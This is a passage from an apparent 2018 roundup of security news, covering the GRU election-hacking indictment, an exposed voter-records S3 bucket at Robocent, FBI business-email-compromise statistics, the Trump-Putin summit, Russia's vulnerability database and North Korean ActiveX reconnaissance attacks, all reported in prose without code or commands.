Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the wide spread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-Centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”

Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

12 Russian Intel Officers charged of hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
The special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, now charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“there’s no allegation in this indictment that any American citizen committed a crime.” said Rosenstein. “the conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, the agents used payment with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General, confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The minority at the US Government is pressing Trump to cancel the meeting with Putin because he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

Russian intelligence

The White House

At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

10:03 PM - Jul 13, 2018
5,186 people are talking about this
Twitter Ads info and privacy
Russian intelligence
Hillary Clinton and Donald Trump are tightening their grips on the Democratic and Republican presidential nominations.

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, there was at least a person close to the Trump campaign and a candidate for Congress that in contact the Russians officers.

FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 result in $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
FBI provided further data related to Email Account Compromise, according to the feds, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 result in $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058 resulting in $2.9 billion in losses. Feds highlighted that most of the fraudulent activities leveraged on China and Hong Kong banks as receipt of fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on the organizations in the real estate industry, from 2015 to 2017, there was an increase of 1,100% of BEC/EAC victims.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continue the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below the BEC/EAC statistics that were shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299
The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:
Total U.S. victims: 41,058
Total U.S. victims: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009
The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 20163. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:
Total U.S. financial recipients: 19,335
Total U.S. financial recipients: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278
According to a report published by TrendMicro published in January 2018, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018.8.

Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported the CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts of hacking of “old emails” of the Republican National Committee was first reported by the CNN in January last year when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of the National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attacker, the number of their attacks continue to increase and the level of sophistication is growing too.

US infrastructure threat

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it. On Friday, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned of threat a “crippling cyber attack on our critical infrastructure” by a nation state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported the Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He made a parallelism on the current situation in the cyberspace with the “alarming activities” that U.S. intelligence detected before al Qaeda conducted Sept. 11, 2001 attack.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency based in the St. Petersburg that was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.

Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, but as expected Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump made a joint news conference and of course, the US President Trump confirmed its trust in the words of the ally Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about alleged Russia’s interference in the 2016 Presidential election, his investigation led to the indictment of 12 Russian intelligence officials working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, this is the Trump’s though.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

Trump Putin
HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below the excerpt from the full transcript from the Helsinki press conference about alleged interference in 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.

Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company database exposed online. The expert was using the online service GrayhatWarfare that could be used to search publicly exposed Amazon Web Services data storage buckets.

The company offers for sale voter records for a price of 3¢/record, the same data that left exposed online.

Querying the system for the term “voters” he found the AWS bucket used by RoboCent.

The bucked discovered by the expert contained 2,584 files, exposed voters’ data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education
RoboCent exposed data

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company that quickly secured the bucket, below the message sent by a developer of the company that solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online, in June 2017 DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.

In December 2017, Diachenko discovered another an exposed MongoDB database containing voter registration data for more than 19 million California residents.

Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
19.7.2018 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.

Russia's National Vulnerability Database Slow, Incomplete
19.7.2018 securityweek BigBrothers

Russia’s national vulnerability database is slow, incomplete and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either considering that the agency is not a public service organization, as its main mission is to protect state and critical infrastructure systems and support counter intelligence initiatives.

The most likely scenario, Recorded Future believes, is that the DBU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.

North Korean Hackers Launch New ActiveX Attacks
19.7.2018 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploitnig an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitors’ operating system and browser and check for ActiveX and running plugins from a specific list of ActiveX components if Internet Explorer was detected.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code to connect websocket to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.

At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.2018 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face to face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.

Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.2018 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

